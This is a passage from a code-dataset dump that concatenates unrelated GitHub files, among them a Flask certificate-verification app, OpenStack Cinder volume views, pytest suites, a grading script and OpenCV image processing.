    \")\n if thisPageNum > 1:\n # print a \"<<\" (previous page link)\n endRow = bigBoard.getInvocationName(reversedPageNum*invocationsPerPage)\n startRow = bigBoard.getInvocationName(((reversedPageNum+1)*invocationsPerPage)-1)\n print((\"<<\" % (startRow, endRow)))\n else:\n # print a \"dummy link\"\n print(\"<<\")\n\n for i in range(1, lastPageNum + 1):\n if i == thisPageNum:\n print(\"%s\" % i) # not a link, since we're already on this page\n else:\n # see comment regarding 'reversedPageNum' above\n reversedI = (lastPageNum + 1) - i\n endRow = bigBoard.getInvocationName((reversedI-1)*invocationsPerPage)\n startRow = bigBoard.getInvocationName((reversedI*invocationsPerPage)-1)\n print((\"%s\" % (startRow, endRow, i)))\n\n if thisPageNum < lastPageNum:\n # print a \">>\" (next page link)\n endRow = bigBoard.getInvocationName((reversedPageNum-2)*invocationsPerPage)\n startRow = bigBoard.getInvocationName(((reversedPageNum-1)*invocationsPerPage)-1)\n print((\">>\" % (startRow, endRow)))\n else:\n # print a \"dummy link\"\n print(\">>\")\n\n print(\"
    \")\n\n startRow = (reversedPageNum - 1) * invocationsPerPage\n endRow = min((startRow + invocationsPerPage - 1), numRows-1)\nelse:\n startRow = 0\n endRow = numRows-1\n\n# generate drop-down menu for easy switching between\n# FlashTest output directories if more than 1 available.\nif len(pathsToOutdirs) > 1:\n print(\"
    \")\n print(\"\")\n print(\"
    \")\n\nprint(\"
     
    \")\n\nbigBoard.spewHtml(sys.stdout, startRow, endRow)\n\nprint(\"\")\nprint(\"\")\n","repo_name":"Flash-X/Flash-X-Test","sub_path":"FlashXTest/backend/Webview/home.py","file_name":"home.py","file_ext":"py","file_size_in_byte":11060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"42697860655","text":"from flask import Flask, request\nfrom OpenSSL import crypto\nimport re\n\napp = Flask(__name__)\n\ndef verify_certificate_chain(cert_data, trusted_data):\n '''\n This function verifies if a given certificate traces to the root certificate in the chain of trust.\n Args:\n cert_data: Certificate data to be verified\n trusted_data: Trusted certificate data\n Return: bool based on verification\n '''\n certificate = crypto.load_certificate(crypto.FILETYPE_PEM, cert_data)\n\n # To extract all the certificates in the chain of trust via the regex\n list_trust = re.findall(\"(-----BEGIN CERTIFICATE-----(.|\\n)+?(?=-----END CERTIFICATE-----)+)\", trusted_data)\n\n #Creating a certificate store and adding all the trusted certificates from the chain\n \n try:\n store = crypto.X509Store()\n\n for _cert in list_trust:\n # appending the footer to the certificate as that was not captured via the regex\n cert = _cert[0] + \"-----END CERTIFICATE-----\"\n client_certificate = crypto.load_certificate(crypto.FILETYPE_PEM, cert)\n store.add_cert(client_certificate)\n \n # Create a certificate context using the store and the loaded certificate\n store_ctx = crypto.X509StoreContext(store, certificate)\n \n # To verify the certificate\n # Returns None if the certificate can be validated\n store_ctx.verify_certificate()\n return True\n\n except Exception as e:\n print(\"Reason: \" + str(e).title())\n return False\n\n@app.route('/verify-certificate', methods=['POST'])\ndef verify_certificate():\n cert_data = request.form['certificate']\n trusted_data = request.form['trusted']\n if verify_certificate_chain(cert_data, trusted_data):\n return \"True\"\n else:\n return \"False\"\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"PoVA-Consensus/Proof-Of-Concept","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"22107153430","text":"from collections import namedtuple\nPoolConfig = namedtuple('PoolConfig', 'partition name memberconfigs')\nMemberConfig = namedtuple('MemberConfig', 'mempartition memname')\n\n\ndef test_get_collection(request, bigip, pool_factory):\n Pool1MemberConfigs = (MemberConfig('Common', '192.168.15.15:80'),\n MemberConfig('Common', '192.168.16.16:8080'),)\n Pool1Config = PoolConfig('Common', 'TEST', Pool1MemberConfigs)\n test_pools = (Pool1Config,)\n pool_registry, member_registry =\\\n pool_factory(bigip, request, test_pools)\n selfLinks = []\n for pool_inst in pool_registry.values():\n for mem in pool_inst.members_s.get_collection():\n selfLinks.append(mem.selfLink)\n assert selfLinks[0] == u'https://localhost/mgmt/tm/ltm/pool/' +\\\n '~Common~TEST/members/~Common~192.168.15.15:80' +\\\n '?ver=11.6.0'\n assert selfLinks[1] == u'https://localhost/mgmt/tm/ltm/pool/' +\\\n '~Common~TEST/members/~Common~192.168.16.16:8080' +\\\n '?ver=11.6.0'\n\n\ndef test_get_dollar_filtered_collection(request, bigip, pool_factory):\n hostname = bigip._meta_data['hostname']\n if bigip.sys.folders.folder.exists(name='za', partition=''):\n bigip.sys.folders.folder.load(name='za', partition='')\n else:\n 
bigip.sys.folders.folder.create(name='za', partition='/')\n Pool1Config = PoolConfig('Common', 'TEST', ((),))\n Pool2Config = PoolConfig('za', 'TEST', ((),))\n test_pools = (Pool1Config, Pool2Config)\n pool_registry, member_registry =\\\n pool_factory(bigip, request, test_pools)\n rp = {'params': {'$filter': 'partition eq za'}}\n pools_in_za = bigip.ltm.pools.get_collection(requests_params=rp)\n muri = pools_in_za[0]._meta_data['uri']\n assert muri == 'https://'+hostname+'/mgmt/tm/ltm/pool/~za~TEST/'\n","repo_name":"yuanfm/f5-common-python","sub_path":"test/functional/test_requests_params.py","file_name":"test_requests_params.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"30850861103","text":"class Course():\n def __init__(self,name,credits,policy,weights):\n self.name = name\n self.credits = credits\n self.policy = policy\n self.weights = weights\n self.final_cutoffs = policy\n self.students = []\n self.marks = []\n self.grades=[]\n self.stu_grades = {}\n\n def final_cutoff(self):\n marks_ = [[] for i in self.policy]\n for m in self.marks:\n if self.policy[0]-2 <=m<= self.policy[0]+2:\n marks_[0].append(m)\n elif self.policy[1]-2 <=m<= self.policy[1]+2:\n marks_[1].append(m)\n elif self.policy[2]-2 <=m<= self.policy[2]+2:\n marks_[2].append(m)\n elif self.policy[3]-2 <=m<= self.policy[3]+2:\n marks_[3].append(m)\n\n for j in range(len(marks_)):\n l = marks_[j]\n l.sort()\n a = 0\n diff = 0\n b = 0\n for i in range(1,len(l)-1):\n d = l[i] - l[i-1]\n if d > diff:\n diff = d\n a = l[i-1]\n b = l[i]\n self.final_cutoffs[j] = (self.policy[j] + (a+b/2))\n\n def find_marks(self):\n for stu in self.students:\n marks = stu.get_marks()\n sum_ = sum(marks)\n self.marks.append(sum_)\n\n def find_grades(self):\n\n for mark in self.marks:\n if mark >= self.final_cutoffs[0]:\n self.grades.append('A')\n\n elif mark >= self.final_cutoffs[1]:\n self.grades.append('B')\n\n elif mark >= self.final_cutoffs[2]:\n self.grades.append('C')\n \n elif mark >= self.final_cutoffs[3]:\n self.grades.append(\"D\")\n else:\n self.grades.append(\"F\")\n\n def add_student(self,s):\n self.students.append(s)\n\n def get_marks(self):\n return self.marks\n\n def get_cutoffs(self):\n return self.final_cutoffs\n \n def get_grades(self):\n return self.grades\n\n def find_student_grades(self):\n for i in range(len(self.students)):\n stu = self.students[i]\n self.stu_grades[stu.get_rollno()] = self.grades[i]\n\n def summary(self):\n return self.stu_grades\n\n def get_marks(self):\n return self.marks\n\n def get_mark_weightage(self,rollno):\n for i in self.students:\n if i.get_rollno() == rollno:\n return i.get_marks()\n\n def get_grade(self,rollno):\n if rollno in self.stu_grades:\n return self.stu_grades[rollno]\n\n def get_summary(self):\n print(f\"\"\"\n\n \nCourse name: {self.name}\n\nInitial cutoffs: \n {self.policy}\n\nFinal Cutoffs: \n {self.final_cutoffs}\n\nStudent Grades: \n {self.stu_grades}\n\nWeights:\n {self.weights}\n\"\"\")\n\nclass Student():\n def __init__(self,marks,rollno):\n self.marks = marks\n self.rollno = rollno\n\n def get_marks(self):\n return self.marks\n\n def get_rollno(self):\n return self.rollno\n\n \n\n\n\nf = open(\"students_marks.txt\",\"r\")\nf1 = open(\"students_grades_4.txt\",\"w\")\nstudents = f.read().splitlines()\ncourse = Course(\"IP\",4,[80, 65, 50, 40], [(\"labs\", 30), (\"midsem\", 15), (\"assignments\", 30), (\"endsem\", 25)])\nfor line in students:\n line = line.split(\", \")\n 
rollno = int(line[0])\n marks = list(map(int,line[1:]))\n st = Student(marks,rollno)\n\n course.add_student(st)\n\ncourse.find_marks()\ncourse.final_cutoff()\ncourse.find_grades()\ncourse.find_student_grades()\n\nd = course.summary()\nmarks = course.get_marks()\ncount = 0\nwhile True:\n\n c = int(input(\"Enter choice: \"))\n if c == 1:\n course.get_summary()\n\n elif c == 2:\n for i in d:\n s = f\"{i}: Marks: {marks[count]} Grade: {d[i]}\\n\"\n count+=1\n f1.write(s)\n\n elif c == 3:\n n = int(input(\"Enter a roll no:\"))\n m = course.get_mark_weightage(n)\n if m == None:\n print(\"No such record!\")\n continue\n s = f\"{n}: Marks: {sum(m)} Weightage: {m} Grade: {d[i]}\\n\"\n print(s)\n\n elif c == 4:\n f1.close()\n f.close()\n break","repo_name":"noeltiju/Semester-1","sub_path":"Assignment3/q4.py","file_name":"q4.py","file_ext":"py","file_size_in_byte":4205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"16918277936","text":"# import pixellib\n# from pixellib.instance import instance_segmentation\n\n# segment_image=instance_segmentation()\n# segment_image.load_model(\"mask_rcnn_coco.h5\")\n# segment_image.segmentImage(\"5a/ST05_SE010107.jpg\", \n# extract_segmented_objects=True,\n# save_extracted_objects=True, \n# show_bboxes=True,\n# output_image_name=\"output.jpg\"\n# )\n\nimport cv2\nimport numpy as np\nimport os\nimport random\nimport shutil\n\nclass Processor:\n # lower_bound = np.array([180,180,180]) # really nice on orange\n satval = 1\n contval = (3, 8)\n thresh = 210\n pad = 50\n limit = 20\n\n def rand_image(self, dir):\n return self.read_file(dir+\"/\"+random.choice(os.listdir(dir)))\n\n # experiment 2\n def to_grayscale(self, img):\n return cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n \n def threshold(self, img):\n # blur the image to smmooth out the edges a bit, also reduces a bit of noise\n blurred = cv2.GaussianBlur(img, (5, 5), 0)\n # convert the image to grayscale \n gray = cv2.cvtColor(blurred, cv2.COLOR_BGR2GRAY)\n # apply thresholding to conver the image to binary format\n # after this operation all the pixels below 200 value will be 0\n _, gray = cv2.threshold(gray, self.thresh , 255, cv2.CHAIN_APPROX_NONE)\n return gray\n\n def create_contour_mask(self, img, contour):\n # create a black `mask` the same size as the original grayscale image \n mask = np.zeros_like(img)\n # fill the new mask with the shape of the largest contour\n # all the pixels inside that area will be white \n cv2.fillPoly(mask, [contour], 255)\n\n # create a copy of the current mask\n res_mask = np.copy(mask)\n res_mask[mask == 0] = cv2.GC_BGD # obvious background pixels\n res_mask[mask == 255] = cv2.GC_PR_BGD # probable background pixels\n res_mask[mask == 255] = cv2.GC_FGD # obvious foreground pixels\n\n # create a mask for obvious and probable foreground pixels\n # all the obvious foreground pixels will be white and...\n # ... 
all the probable foreground pixels will be black\n mask2 = np.where(\n (res_mask == cv2.GC_FGD) | (res_mask == cv2.GC_PR_FGD),\n 255,\n 0\n ).astype('uint8')\n\n # create `new_mask3d` from `mask2` but with 3 dimensions instead of 2\n new_mask3d = np.repeat(mask2[:, :, np.newaxis], 3, axis=2)\n mask3d = new_mask3d\n mask3d[new_mask3d > 0] = 255.0\n mask3d[mask3d > 255] = 255.0\n # apply Gaussian blurring to smoothen out the edges a bit\n # `mask3d` is the final foreground mask (not extracted foreground image)\n return cv2.GaussianBlur(mask3d, (5, 5), 0), mask2\n\n def apply_contour_mask(self, img, mask):\n # create the foreground image by zeroing out the pixels where `mask2`...\n # ... has black pixels\n foreground = np.copy(img).astype(float)\n foreground[mask == 0] = 255\n return foreground.astype(np.uint8)\n\n def find_largest_contour(self, image):\n \"\"\"\n This function finds all the contours in an image and return the largest\n contour area.\n :param image: a binary image\n \"\"\"\n image = image.astype(np.uint8)\n contours, hierarchy = cv2.findContours(\n image,\n cv2.RETR_TREE,\n cv2.CHAIN_APPROX_SIMPLE\n )\n largest_contour = max(contours, key=cv2.contourArea)\n return largest_contour\n \n def process_dir(self, dir):\n out = dir+\"_out\"\n if os.path.exists(out):\n shutil.rmtree(out)\n os.makedirs(out)\n\n i = 0\n for file in os.listdir(dir):\n if file.endswith(\".jpg\"):\n self.process_image(dir+\"/\"+file, out+\"/\"+file)\n i += 1\n if self.limit > 0 and i > self.limit:\n break\n\n def process_image(self, file, output):\n img = self.read_file(file)\n contrast = self.contrast(img, self.contval)\n sat = self.saturate(contrast, self.satval)\n gray = self.threshold(sat)\n contour = self.find_largest_contour(gray)\n if contour is not None:\n mask3d, mask2 = self.create_contour_mask(gray, contour)\n foreground = self.apply_contour_mask(img, mask2)\n bbox = self.bbox_contour(contour)\n if bbox is not None:\n cropped = self.crop(foreground, bbox)\n if cropped.size == 0:\n print(\"image empty\")\n else:\n self.write_file(cv2.cvtColor(cropped, cv2.COLOR_RGB2BGR), output)\n else:\n print(\"bbox too small\")\n else:\n print(\"skipping.\")\n \n def read_file(self, file):\n img = cv2.imread(file)\n return cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n\n def write_file(self, img, file):\n return cv2.imwrite(file, img)\n \n def crop(self, img, crop):\n x, y, w, h = crop\n return img[y:y+h,x:x+w]\n\n def bbox_contour(self, contour):\n \"\"\"Crop the mask\"\"\"\n _x,_y,_w,_h = cv2.boundingRect(contour)\n if _w > 100 and _h > 100:\n x,y,w,h = _x, _y, _w, _h\n diff = w - h\n if diff > 0:\n x -= self.pad\n w += 2 * self.pad\n y = y - diff // 2 - self.pad\n h = w\n elif diff < 0:\n y -= self.pad\n h += 2 * self.pad\n x = x + diff // 2 - self.pad\n w = h\n return x,y,w,h\n \n def saturate(self, img, satval):\n imghsv = cv2.cvtColor(img, cv2.COLOR_RGB2HSV).astype(\"float32\")\n h, s, v = cv2.split(imghsv)\n s = s*satval\n s = np.clip(s,0,255)\n imgmer = cv2.merge([h,s,v])\n return cv2.cvtColor(imgmer.astype(\"uint8\"), cv2.COLOR_HSV2RGB)\n\n def contrast(self, img, contrast):\n clip, k = contrast\n lab= cv2.cvtColor(img, cv2.COLOR_RGB2LAB)\n l, a, b = cv2.split(lab)\n clahe = cv2.createCLAHE(clipLimit=clip, tileGridSize=(k,k))\n cl = clahe.apply(l)\n limg = cv2.merge((cl,a,b))\n return cv2.cvtColor(limg, 
cv2.COLOR_LAB2RGB)","repo_name":"CaptainStiggz/petals","sub_path":"preprocessing/process_v2.py","file_name":"process_v2.py","file_ext":"py","file_size_in_byte":5636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"1088366","text":"import multiprocessing\nfrom multiprocessing.managers import SyncManager\nimport mem_struc_t as m_s\n\nm_s.MyManager.register('mem_test', m_s.mem_test)\n\ndef update_mem(mem_test_inst):\n #append to list a first time\n loc = m_s.position(1,2,3)\n #m_s.lock.acquire()\n m_s.append_pos_list(mem_test_inst, 0, loc)\n #m_s.lock.release()\n\n #append to list a second time\n loc = m_s.position(4,5,6)\n #m_s.lock.acquire()\n m_s.append_pos_list(mem_test_inst, 0, loc)\n #m_s.lock.release()\n\n check = m_s.check(mem_test_inst)\n\n print(check.get(0).position_list.get(0).x )\n print(check.get(0).position_list.get(0).y )\n print(check.get(0).position_list.get(0).phi )\n\n print(check.get(0).position_list.get(1).x )\n print(check.get(0).position_list.get(1).y )\n print(check.get(0).position_list.get(1).phi )\n\n\ndef test():\n manager = m_s.Manager()\n mem_test_inst = manager.mem_test()\n\n m_s.create_map_list(mem_test_inst, 2)\n\n l = multiprocessing.Lock()\n pool = multiprocessing.Pool(multiprocessing.cpu_count())\n for _ in range(0,2):\n pool.apply_async(func=update_mem, args=(mem_test_inst,))\n pool.close()\n pool.join()\n\nif __name__ == \"__main__\":\n test()\n","repo_name":"Brandonio-c/SYMBO-SLAM","sub_path":"Control_Agent_2/src/tests/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1183,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"9579901445","text":"from cinder.api import common\nfrom cinder import group as group_api\nfrom cinder.objects import fields\nfrom cinder.volume import group_types\n\n\nclass ViewBuilder(common.ViewBuilder):\n \"\"\"Model a server API response as a python dictionary.\"\"\"\n\n _collection_name = \"volumes\"\n\n def __init__(self):\n \"\"\"Initialize view builder.\"\"\"\n super(ViewBuilder, self).__init__()\n\n def summary_list(self, request, volumes, volume_count=None):\n \"\"\"Show a list of volumes without many details.\"\"\"\n return self._list_view(self.summary, request, volumes,\n volume_count)\n\n def detail_list(self, request, volumes, volume_count=None):\n \"\"\"Detailed view of a list of volumes.\"\"\"\n return self._list_view(self.detail, request, volumes,\n volume_count,\n self._collection_name + '/detail')\n\n def summary(self, request, volume):\n \"\"\"Generic, non-detailed view of a volume.\"\"\"\n return {\n 'volume': {\n 'id': volume['id'],\n 'name': volume['display_name'],\n 'links': self._get_links(request,\n volume['id']),\n },\n }\n\n def _get_volume_status(self, volume):\n # NOTE(wanghao): for fixing bug 1504007, we introduce 'managing',\n # 'error_managing' and 'error_managing_deleting' status into managing\n # process, but still expose 'creating' and 'error' and 'deleting'\n # status to user for API compatibility.\n status_map = {\n 'managing': 'creating',\n 'error_managing': 'error',\n 'error_managing_deleting': 'deleting',\n }\n vol_status = volume.get('status')\n return status_map.get(vol_status, vol_status)\n\n def detail(self, request, volume):\n \"\"\"Detailed view of a single volume.\"\"\"\n volume_ref = {\n 'volume': {\n 'id': volume.get('id'),\n 'status': self._get_volume_status(volume),\n 'size': volume.get('size'),\n 'availability_zone': 
volume.get('availability_zone'),\n 'created_at': volume.get('created_at'),\n 'updated_at': volume.get('updated_at'),\n 'name': volume.get('display_name'),\n 'description': volume.get('display_description'),\n 'volume_type': self._get_volume_type(request, volume),\n 'snapshot_id': volume.get('snapshot_id'),\n 'source_volid': volume.get('source_volid'),\n 'metadata': self._get_volume_metadata(volume),\n 'links': self._get_links(request, volume['id']),\n 'user_id': volume.get('user_id'),\n 'bootable': str(volume.get('bootable')).lower(),\n 'encrypted': self._is_volume_encrypted(volume),\n 'replication_status': volume.get('replication_status'),\n 'consistencygroup_id': volume.get('consistencygroup_id'),\n 'multiattach': volume.get('multiattach'),\n }\n }\n ctxt = request.environ['cinder.context']\n\n attachments = self._get_attachments(volume, ctxt.is_admin)\n volume_ref['volume']['attachments'] = attachments\n\n if ctxt.is_admin:\n volume_ref['volume']['migration_status'] = (\n volume.get('migration_status'))\n\n # NOTE(xyang): Display group_id as consistencygroup_id in detailed\n # view of the volume if group is converted from cg.\n group_id = volume.get('group_id')\n if group_id is not None:\n # Not found exception will be handled at the wsgi level\n grp = group_api.API().get(ctxt, group_id)\n cgsnap_type = group_types.get_default_cgsnapshot_type()\n if grp.group_type_id == cgsnap_type['id']:\n volume_ref['volume']['consistencygroup_id'] = group_id\n\n return volume_ref\n\n def _is_volume_encrypted(self, volume):\n \"\"\"Determine if volume is encrypted.\"\"\"\n return volume.get('encryption_key_id') is not None\n\n def _get_attachments(self, volume, is_admin):\n \"\"\"Retrieve the attachments of the volume object.\"\"\"\n attachments = []\n\n for attachment in volume.volume_attachment:\n if (attachment.get('attach_status') ==\n fields.VolumeAttachStatus.ATTACHED):\n a = {'id': attachment.get('volume_id'),\n 'attachment_id': attachment.get('id'),\n 'volume_id': attachment.get('volume_id'),\n 'server_id': attachment.get('instance_uuid'),\n 'host_name': attachment.get('attached_host'),\n 'device': attachment.get('mountpoint'),\n 'attached_at': attachment.get('attach_time'),\n }\n if not is_admin:\n a['host_name'] = None\n attachments.append(a)\n\n return attachments\n\n def _get_volume_metadata(self, volume):\n \"\"\"Retrieve the metadata of the volume object.\"\"\"\n return volume.metadata\n\n def _get_volume_type(self, request, volume):\n \"\"\"Retrieve the type of the volume object.\"\"\"\n if volume['volume_type_id'] and volume.get('volume_type'):\n return volume['volume_type']['name']\n else:\n return volume['volume_type_id']\n\n def _list_view(self, func, request, volumes, volume_count,\n coll_name=_collection_name):\n \"\"\"Provide a view for a list of volumes.\n\n :param func: Function used to format the volume data\n :param request: API request\n :param volumes: List of volumes in dictionary format\n :param volume_count: Length of the original list of volumes\n :param coll_name: Name of collection, used to generate the next link\n for a pagination query\n :returns: Volume data in dictionary format\n \"\"\"\n volumes_list = [func(request, volume)['volume'] for volume in volumes]\n volumes_links = self._get_collection_links(request,\n volumes,\n coll_name,\n volume_count)\n volumes_dict = dict(volumes=volumes_list)\n\n if volumes_links:\n volumes_dict['volumes_links'] = volumes_links\n\n return 
volumes_dict\n","repo_name":"openstack/cinder","sub_path":"cinder/api/v2/views/volumes.py","file_name":"volumes.py","file_ext":"py","file_size_in_byte":6526,"program_lang":"python","lang":"en","doc_type":"code","stars":628,"dataset":"github-code","pt":"66"} +{"seq_id":"33606938332","text":"import pytest\n\nAIRPORT_POINT = [37.584373, 55.817079]\nCITY_POINT = [37.646516, 55.665302]\n\n\ndef get_airport_zones_config():\n return {\n 'moscow': {\n 'airport_title_key': 'moscow_airport_key',\n 'enabled': True,\n 'main_area': 'moscow_airport',\n 'notification_area': 'moscow_airport_notification',\n 'old_mode_enabled': False,\n 'tariff_home_zone': 'moscow',\n 'update_interval_sec': 5,\n 'use_queue': True,\n 'waiting_area': 'moscow_airport_waiting',\n 'whitelist_classes': {\n 'econom': {'reposition_enabled': False, 'nearest_mins': 60},\n },\n 'mix_city_orders': True,\n },\n }\n\n\ndef get_request_body(uuids, point, destination, order_calc_time=0):\n request_body = {\n 'driver_ids': [{'uuid': uuid, 'dbid': 'dbid0'} for uuid in uuids],\n 'geoindex': 'graph',\n 'max_distance': 9999999,\n 'limit': 3,\n 'filters': ['efficiency/airport_entry_limit'],\n 'point': point,\n 'destination': destination,\n 'zone_id': 'moscow_airport',\n 'order': {'calc': {'time': order_calc_time}},\n }\n\n return request_body\n\n\n@pytest.mark.parametrize(\n 'order_point, order_dest, limit_end, order_time, '\n 'use_ttl_config, is_driver_in_result',\n [\n # Order not in airport\n (CITY_POINT, CITY_POINT, '2020-04-20T20:10:00+00:00', 0, False, True),\n # Source in airport, no limit\n (AIRPORT_POINT, CITY_POINT, None, 0, False, True),\n # Source in airport, has limit\n (\n AIRPORT_POINT,\n CITY_POINT,\n '2020-04-20T20:00:00+00:00',\n 0,\n False,\n False,\n ),\n # Source in airport, limit drops\n (\n AIRPORT_POINT,\n CITY_POINT,\n '2020-04-20T09:55:00+00:00',\n 0,\n False,\n True,\n ),\n # Source in airport, limit doesn't drop cause with config\n (\n AIRPORT_POINT,\n CITY_POINT,\n '2020-04-20T09:55:00+00:00',\n 0,\n True,\n False,\n ),\n # Destination in airport, no limit\n (CITY_POINT, AIRPORT_POINT, None, 0, False, True),\n # Destination in airport, has limit\n (\n CITY_POINT,\n AIRPORT_POINT,\n '2020-04-20T20:00:00+00:00',\n 0,\n False,\n False,\n ),\n # Destination in airport, limit drops 1\n (\n CITY_POINT,\n AIRPORT_POINT,\n '2020-04-20T10:00:00+00:00',\n 0,\n False,\n True,\n ),\n # Destination in airport, limit drops 2\n (\n CITY_POINT,\n AIRPORT_POINT,\n '2020-04-20T10:00:00+00:00',\n 100000,\n False,\n True,\n ),\n # Destination in airport, limit drops 3\n (\n CITY_POINT,\n AIRPORT_POINT,\n '2020-04-20T11:00:00+00:00',\n 2000,\n False,\n True,\n ),\n # Destination in airport, limit doesn't drop with config\n (\n CITY_POINT,\n AIRPORT_POINT,\n '2020-04-20T11:00:00+00:00',\n 2000,\n True,\n False,\n ),\n ],\n)\n@pytest.mark.geoareas(filename='airport_geoareas_graph_search.json')\n@pytest.mark.config(\n DISPATCH_AIRPORT_CACHE_TTL=10,\n DISPATCH_AIRPORT_ZONES=get_airport_zones_config(),\n DISPATCH_AIRPORT_AREA_ENTRY_TRACKING={\n 'moscow': {'candidates_filter_settings': {'': True}},\n },\n DISPATCH_AIRPORT_QUEUES_CACHE_GET_ENTRY_LIMIT_REACHED=True,\n)\n@pytest.mark.now('2020-04-20T10:00:00+00:00')\nasync def test_airport_idx(\n taxi_candidates,\n taxi_config,\n driver_positions,\n mockserver,\n order_point,\n order_dest,\n limit_end,\n order_time,\n use_ttl_config,\n is_driver_in_result,\n):\n if use_ttl_config:\n add_raw = 300\n add_percent = 0.2\n else:\n add_raw = 0\n add_percent = 0\n taxi_config.set_values(\n {\n 
'DISPATCH_AIRPORT_AREA_ENTRY_TRACKING': {\n 'moscow': {\n 'candidates_filter_settings': {\n 'filter_enabled': True,\n 'eta_correction_raw': add_raw,\n 'eta_correction_percent': add_percent,\n },\n },\n },\n },\n )\n\n @mockserver.json_handler('/dispatch-airport/v1/active-drivers-queues')\n def _active_drivers_queues(request):\n if limit_end:\n return {\n 'queues': [],\n 'entry_limit_reached': [\n {'dbid_uuid': 'dbid0_uuid0', 'limit_end_ts': limit_end},\n ],\n }\n return {'queues': [], 'entry_limit_reached': []}\n\n await driver_positions(\n [{'dbid_uuid': 'dbid0_uuid0', 'position': AIRPORT_POINT}],\n )\n\n request_body = get_request_body(\n uuids=['uuid0'],\n point=order_point,\n destination=order_dest,\n order_calc_time=order_time,\n )\n await taxi_candidates.invalidate_caches(\n cache_names=['dispatch-airport-queues-cache'],\n )\n response = await taxi_candidates.post('search', json=request_body)\n assert response.status_code == 200\n json = response.json()\n assert 'drivers' in json\n if is_driver_in_result:\n assert len(json['drivers']) == 1\n assert json['drivers'][0]['uuid'] == 'uuid0'\n else:\n assert not json['drivers']\n","repo_name":"Alexander-Berg/2022-tests-examples-2","sub_path":"Taxi/tests_candidates/test_filter_airport_entry_limit.py","file_name":"test_filter_airport_entry_limit.py","file_ext":"py","file_size_in_byte":5700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"16982657628","text":"import numpy as np\n\n# Read main files\ntrain = open('../dataset/NL2SparQL4NLU.train.conll.txt', 'r')\ntest = open('../dataset/NL2SparQL4NLU.test.conll.txt', 'r')\ntrain_csv = open('train_tags.csv', 'w')\ntest_csv = open('test_tags.csv', 'w')\n\n########################\n# Reading of train file\n########################\n\n# Sentences of corpus\ntrain_sents = []\ntmp = []\n\n# Identify all sentences with tuples of word-tag\nfor line in train:\n\ta = list(line.split())\n\n\tif len(a) > 0:\n\t\ttmp.append(tuple(a))\n\telse:\n\t\ttrain_sents.append(tmp)\n\t\ttmp = []\n\t\t\t\n########################\n# Reading of test file\n########################\n\n# Sentences of corpus\ntest_sents = []\ntmp = []\n\n# Identify all sentences with tuples of word-tag\nfor line in test:\n\ta = list(line.split())\n\n\tif len(a) > 0:\n\t\ttmp.append(tuple(a))\n\telse:\n\t\ttest_sents.append(tmp)\n\t\ttmp = []\n\t\t\n\t\t\n######################################\n# Basic information about the dataset\n######################################\n\nprint(\"SENTENCES ANALYSIS\\n\")\n\n# Number of sentences and their average length in training set\nprint(\"Number of training set sentences: \", len(train_sents))\nprint(\"Average length of training sentences: {}\\n\".format(np.mean([len(s) for s in train_sents])))\n\n# Number of sentences and their average length in test set\nprint(\"Number of test set sentences: \", len(test_sents))\nprint(\"Average length of test sentences: {}\\n\\n\".format(np.mean([len(s) for s in test_sents])))\n\n\n################################\n# Concepts and OOV distribution\n################################\n\nprint(\"CONCEPTS DISTRIBUTIONS\\n\")\n\n# Count train concepts\ntrain_concepts_counts = {}\ntotal = 0\n\nfor p in train_sents:\n\tfor i, t in enumerate(p):\n\t\ttrain_concepts_counts[t[1]] = train_concepts_counts.get(t[1], 0) + 1\n\t\ttotal += 1\n\t\t\nsorted_train_concepts = sorted(train_concepts_counts.items(), key=lambda x: x[1], reverse=True)\nprint(\"Train concepts: {}\".format(sorted_train_concepts))\n\n# Out of 
concept percentage\nprint(\"Train out of concept percentage (\\\"O\\\" tag): {}%\".format(train_concepts_counts['O']/total*100))\nprint(\"Concepts tags for training percentage: {}%\\n\".format((1-train_concepts_counts['O']/total)*100))\n\n# Save the information about train tags counts in a file\n# Header\nhead = \"tag, counts\\n\"\ntrain_csv.write(head)\n\nfor el in sorted_train_concepts:\n\tstring = el[0] + \", \" + str(el[1]) + \"\\n\"\n\ttrain_csv.write(string)\n\t\n\n# Count test concepts\ntest_concepts_counts = {}\ntotal = 0\n\nfor p in test_sents:\n\tfor i, t in enumerate(p):\n\t\ttest_concepts_counts[t[1]] = test_concepts_counts.get(t[1], 0) + 1\n\t\ttotal += 1\n\t\t\nsorted_test_concepts = sorted(test_concepts_counts.items(), key=lambda x: x[1], reverse=True)\nprint(\"Test concepts: {}\".format(sorted_test_concepts))\n\n# Out of concept percentage\nprint(\"Test out of concept percentage (\\\"O\\\" tag): {}%\".format(test_concepts_counts['O']/total*100))\nprint(\"Concepts tags for test percentage: {}%\\n\".format((1-test_concepts_counts['O']/total)*100))\n\n# Save the information about test tags counts in a file\n# Header\nhead = \"tag, counts\\n\"\ntest_csv.write(head)\n\nfor el in sorted_test_concepts:\n\tstring = el[0] + \", \" + str(el[1]) + \"\\n\"\n\ttest_csv.write(string)\ntest_csv.close()\n","repo_name":"Svidon/LUS_Project1","sub_path":"data_analysis/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":3166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"30275924705","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Apr 6 20:08:24 2021\n\n@author: USER\n\"\"\"\n\nimport pandas as pd\nimport tensorflow as tf\nfrom sklearn.preprocessing import MinMaxScaler, OneHotEncoder\nfrom sklearn.model_selection import train_test_split\n\ndef import_data():\n dataset = pd.read_csv(\"gender_classification.csv\")\n x = dataset[[\"long_hair\", 